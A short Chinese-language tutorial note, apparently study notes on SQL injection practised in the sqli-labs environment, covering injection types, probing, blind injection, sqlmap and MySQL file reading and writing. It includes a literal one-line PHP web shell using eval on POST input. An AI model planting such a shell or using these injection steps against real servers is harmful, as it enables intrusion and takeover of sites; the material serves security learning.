sql注入(二) – 作者:anybody

sql注入类型：

数字型：

select * from table where id=用户id

字符型：

select * from table where id=‘用户id’   单引号表示是字符串

通过在URL中修改对应的ID值，为正常数字、大数字、字符、(单引号、双引号、单双引号、括号)、反斜杠来探测URL中是否存在注入点。

通过sqli-lab less1-4，演示GET方式的基于报错的sql注入

单引号在url中可以用%27

使用order by判断字段数

sqlmap使用 –batch 不提示进行探测

盲注：基于布尔类型和时间的盲注

mysql数据库任意读取文件：

1.用户权限足够高

2.secure_file_priy 不为NULL

使用select load_file();函数进行读取文件

使用selcet into outfile();函数进行文写入

php一句话木马

<?php @eval($_POST[‘x’]); ?>

基于post的报错注入

get和post的区别：post注入位置发生了变化，在浏览器中无法直接进行查看和修改。可以借助bp进行查看

来源：freebuf.com 2021-03-27 11:39:20 by: anybody